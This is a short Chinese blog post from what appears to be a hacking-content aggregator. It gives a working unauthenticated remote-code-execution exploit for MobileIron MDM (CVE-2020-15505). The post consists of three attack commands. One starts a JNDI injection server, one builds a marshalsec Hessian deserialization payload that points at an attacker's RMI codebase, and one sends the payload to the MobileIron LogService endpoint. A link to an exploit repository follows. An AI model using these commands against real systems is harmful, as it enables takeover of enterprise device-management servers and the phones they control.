记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

MobileIron MDM 未授权RCE EXP

2020-09-14 20:03

MOBILEIRON MDM 未授权RCE EXP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command>"
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<server-ip>:1099/<codebase> > exp
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService


https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505


知识来源: https://mp.weixin.qq.com/s?__biz=MzU0ODg2MDA0NQ==&mid=2247484619&idx=1&sn=4dd44e4c979708aa79f4d3513236062d

阅读:38868 | 评论:0 | 标签:exp mobile

想收藏或者和大家分享这篇好文章→复制链接地址

“MobileIron MDM 未授权RCE EXP”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云